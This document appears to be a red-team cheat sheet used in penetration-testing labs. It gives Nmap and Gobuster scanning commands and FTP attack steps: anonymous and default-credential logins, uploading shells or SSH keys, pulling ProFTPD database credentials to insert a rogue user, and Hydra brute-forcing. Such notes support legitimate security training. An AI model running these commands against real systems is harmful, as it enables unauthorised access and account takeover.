redteam_cheatsheet

# Top commands 🥇 ## Nmap ```bash sudo nmap -sSCV --min-rate 5000 -Pn -n -p- --open -vvv -oA all_ports <target> ``` ## Gobuster ```bash # Directories gobuster dir -e -t 100 -b 400-600 --exclude-length 0 --no-error -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -w /usr/share/wordlists/own/final_directories.txt -u <target> # Filenames gobuster dir -e -t 100 -b 400-600 --exclude-length 0 --no-error -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -w /usr/share/own/dirb/common_4459.txt -x .asp,.aspx,.config,.do,.git,.html,.jsp,.pdf,.php,.ps1,.sql,.txt,.yml -u <target> # Virtual hosts gobuster vhost -t 100 -w /usr/share/own/subdomain/knocpy_1921.txt --append-domain -u <target> # No use http:// ``` # Pentesting Services 🪲 ## 21 FTP ```bash # Default ports are 20 (for data), 21 (for control). # Try `admin:admin user:system` credentials always. # If FTP not working or slow, use `passive off` after login successful. # Use `binary` if you upload shell.exe # Check anonymous user ftp -n <target> <<END user anonymous anonymous <command> quit END # ls # put <local_file <remote_file> # Download get <file> # Upload mput <local_file> <remote_file> # Use secure FTP ftp-ssl -z secure -z verify=0 -z cipher="$(openssl ciphers -tls1)" -p <target> # ProFTP credentials cat /etc/proftpd/sql.conf # SQLConnectInfo proftpd@localhost proftpd protfpd_with_MYSQL_password # Add user mysql -u proftpd -p'protfpd_with_MYSQL_password' -h 127.0.0.1 -P 3306 show databases; use proftpd; select * from ftpuser; # Create proftpd user /bin/echo "{md5}"`/bin/echo -n '23Qwerty!' | openssl dgst -binary -md5 | openssl enc -base64` # {md5}RPesAkyTyJaqB6afVNB2pA== INSERT INTO `ftpuser` (`id`, `userid`, `passwd`, `uid`, `gid`, `homedir`, `shell`, `count`, `accessed`, `modified`) VALUES (NULL, 'benoit', '{md5}RPesAkyTyJaqB6afVNB2pA==', '1000', '1000', '/', '/bin/bash', '0', '2022-12-05 05:26:29', '2022-12-12 05:26:29'); # Connect to FTP and upload authorized_keys # https://medium.com/@nico26deo/how-to-set-up-proftpd-with-a-mysql-backend-on-ubuntu-c6f23a638caf # Nmap FTP NSE nmap --script ftp-anon -p 21 <target> nmap --script ftp-vuln* -p 21 <target> nmap --script ftp-* -p 21 <target> # FTP Bruteforce hydra -I -V -f -u -e nsr -L usernames.txt -P usernames.txt <target> ftp -s 21 # or use ftp://<machine_ip> # Default credentials paste -d ":" usernames.txt passwords.txt > ftp_credentials.txt hydra -I -V -f -u -e s -t 1 -C /usr/share/wordlists/own/services/ftp/ftp_credentials.txt exghost.offsec ftp -s 21 # Try machine_name:machine_name ```